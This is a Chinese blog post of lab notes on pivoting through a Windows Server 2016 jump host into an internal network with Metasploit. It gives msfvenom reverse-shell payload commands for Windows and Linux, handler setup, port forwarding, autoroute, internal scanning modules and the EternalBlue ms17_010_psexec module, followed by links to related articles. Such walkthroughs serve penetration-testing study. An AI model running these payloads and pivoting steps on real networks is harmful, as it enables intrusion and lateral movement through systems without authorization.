内网攻击跳板机为Windows

最新推荐文章于 2024-08-29 16:12:55 发布
最新推荐文章于 2024-08-29 16:12:55 发布
阅读量121 收藏 1
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kiihuang/article/details/130046324
版权
  • 攻击机kali 192.168.114.62 仅可和 192.168.114.63 通信
  • 中间机 192.168.114.63 和 10.10.10.128 windows 2016 server
  • 内网机 10.10.10.129 10.10.10.130 Linux和windos
  • kali生成对应的shell 
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.114.62 LPORT=4444 -f exe > /tmp/shell.exe

  • 传入192.168.114.63 
    use exploit/multi/handler
设置选项,进行监听

portfwd add -l 8889 -r 10.10.10.130 -p 80   #开启端口转发,将内网的80端口转发到本机的8889端口,该方法网速较慢

netsh interface portproxy add v4tov4 listenport=8888 connectaddress=10.10.10.130 connectport=80   #使用shell,在windows2016上开启端口转发

     

     

  • 进入server2016的shell,使用arp -a 初步摸清网段 
    在Meterpreter中先利用 run get_local_subnets 查看目标主机的路由情况
run autoroute -s 192.168.114.0/24   #添加对应网段
也可以:run post/multi/manage/autoroute  自动添加木马所在主机上的所有路由
或者在MSF提示符下使用: route add 添加路由

  • 之后在Meterpreter使用 run autoroute -p 查看添加的路由
  • 使用bg或backgroud命令回退到MSF提示符,并利用以下模块扫描存活主机: 
    auxiliary/scanner/discovery/arp_sweep    #基于ARP的本地网络发现
auxiliary/scanner/portscan/syn           #基于tcp的syn回复进行端口扫描
auxiliary/scanner/ftp/ftp_version        #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version        #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version  #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp            #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version      #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title             #探测内网http服务的标题
auxiliary/scanner/smb/smb_version        #发现内网smb服务,基于默认的445端口   
use auxiliary/scanner/mssql/mssql_schemadump  #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump  #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version    #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner        #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server     #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version        #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname         #探测内网主机的netbios名字

  • 扫出结果,有以下端口开放

 

  • 对指定端口进行扫描

 

  • 选择针对的模块 
    exploit/windows/smb/ms17_010_psexec   #根据永恒之蓝制作的主动模块

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > msfshell.elf #linux木马

     

gg_Go_game
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1705
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
内网渗透系列之Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
lza20001103的博客
09-04 2138
Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限 文章目录Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限前言msf反弹shell配置路由存活主机探测端口扫描后记 前言 相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网
MSF的利用
weixin_43570648的博客
04-18 960
其实MSF大部分都用来用ms17_010,其实MSF还有很多功能,比如用他来打打CMS的exp呀,还有对端口的攻击,生成payload,在此,我也记一个笔记,供大家分享。 1.首先基于MSF的资产收集 网络主机收集: use auxiliary/scanner/discovery/udp_probe use auxiliary/scanner/discovery/udp_sweep use au...
客的隐藏术之跳板攻击
Candour_0的博客
03-05 254
客的隐藏术之跳板攻击
浅谈域名解析
灵魂画师牧码
03-09 903
域名解析,本质是将域名和ip地址绑定,方便用户记忆和访问,这个概念在计算机网络中讲的非常清楚,我今天主要就实际应用来讲一下我的理解。 下面整体讲一下我做域名解析的过程。 整个过程主要为:拥有服务器和ip地址拥有域名将域名和ip地址绑定使用域名访问网站1、拥有服务器和ip地址:我购买的是云服务器,原来是阿里云,现在是腾讯云,在购买完之后就会有一个外部可访问的ip地址,也就是123.206.3
DNS检测 解决使用github速度慢(速度快了好多)
_Alexander的博客
02-28 1万+
亲测十分有效,比其他方法快好多好多 首先进行DNS检测 DNS检测网站 然后在输入框输入http://github.com 然后你就会看到检测出来的好多IP 找到一个TTL值最小的IP地址 添加到hosts文件里面 IP地址 http://github.com 就上面那一行就可以了(IP地址是刚才找到的TTL值最小的那一个) ...
红日靶场--内网渗透练习
Nailaoyyds的博客
04-21 4006
环境介绍: 内网 kali 192.168.171.137 win7 192.168.171.153 192.168.52.130 win2003 192.168.52.131 win2008 192.168.52.138 信息收集 内网主机存...
内网安全之:Metasploit 跳板攻击: 添加路由方式
f_carey的博客
09-04 924
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 跳板攻击: 添加路由方式1 Metasploit 跳板攻击: 添加路由方式原理2 实验环境2.1 建立 meterpreter 反向连接2.2 查看当前系统信息2.3 利用增加的路由扫描新网段的主机3 meterpreter 基础命令 1 Metasploit 跳板攻击: 添加路由方式.
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
使用`netstat -ano`可揭示机器的通信状态,通过分析入站和出站流量,可以获取跳板机、管理员PC、本地Web应用端口、敏感服务(如Redis、MySQL、MSSQL)和API端口等信息。 3. **配置文件查找**: 寻找包含敏感信息...
内网横向移动思路和技巧
热门推荐
11-30 2万+
攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网中横向移动。最简单的方式,就是使用明文密码进行登录远程服务器。在这里,我...
内网主机探测
LainWith的博客
10-09 1160
目录存活探测Netbios协议探测nmap扫描msf扫描nbtscan扫描ICMP协议探测基于cmd的ping扫描⭐⭐⭐nmap扫描UDP协议探测SMB协议探测msfMSF探测辅助模块汇总MSF探测主机存活探测端口扫描服务探测更多参考 存活探测 Netbios协议探测 可以获得内网主机的主机名和MAC地址等信息,要扫描的目标端口是137 nmap扫描 nmap -sU --script nbstat.nse -p137 192.168.239.0/24 -T4 msf扫描 use auxiliary/s
Linux基础知识(一、什么是Linux
心寒的博客
08-26 1503
什么是Linux Linux创始人
Linux中的常见命令——用户管理命令
qq_45569925的博客
08-27 918
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
虚拟内存和linux(操作系统八股文part1)
linjixia的博客
08-24 1515
八股之虚拟内存和Linux部分的笔记。
Linux自旋锁和读写锁
m0_74830524的博客
08-24 1025
在前面的文章中我们已经介绍了有关互斥锁的概念与使用,本篇将开始介绍在 Linux 中的自旋锁和读写锁。这三种锁分别用于在不同的应用场景之中,其中互斥锁最为常用,但是我们需要了解一下其他的锁。 对于自旋锁和读写锁都介绍了其原理以及接口使用,并且给出了样例代码。
linux 系统性能调优技巧
m0_50641264的博客
08-27 741
【代码】linux 系统性能调优技巧。
RockPI 4A单板Linux 4.4内核下的RK3399 GPIO功能解析
m0_67544708的博客
08-26 1140
在GPIO方面,RK3399提供了多达16个GPIO控制器,每个控制器可配置的GPIO引脚数量不等。通过详细的代码解析和示例,帮助读者理解如何在Linux内核中使用GPIO,以及如何通过GPIO实现单板的基本控制和功能扩展。为了更好地理解如何在Linux内核中使用RK3399的GPIO功能,下面是一个简单的示例代码,展示了如何通过GPIO控制LED灯的亮灭。函数,用于设置GPIO引脚的方向。在设置GPIO引脚方向为输出模式后,可以设置GPIO引脚的值。在获取GPIO引脚后,可以设置GPIO引脚的方向。
Linux报错:make[2]: *** No rule to make target ‘/usr/local/lib/libopus.a‘
VIFIN的博客
08-27 520
解决报错:make[2]: *** No rule to make target '/usr/local/lib/libopus.a'
Linux——进程管理
最新发布
m0_67677309的博客
08-29 860
1、通过fork创建的子进程会拷贝父进程(数据段、bss段、堆、栈、I/O缓冲区),与父进程共享代码段、子进程会继承父进程的信号处理方式。ITIMER_VIRTUAL 虚拟计时器 用户态的计时SIGVTALRM(26)**使用的时候要对应。ITIMER_REAL 真实计时器 程序总的计时时间SIGALRM(14)void (*sa_restorer)(void);// 第一次产生时钟信号的时间 **3秒钟一次,每个两秒。
浏览器访问带有跳板机ssh的内网服务器
06-08
例如,如果要通过跳板机连接 IP 地址为 `192.168.1.100`,端口号为 `22` 的内网服务器,可以使用以下命令: ``` ssh -L 8888:192.168.1.100:22 user@jumpserver.com ``` 2. 输入跳板机的登录密码进行身份验证。 3...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值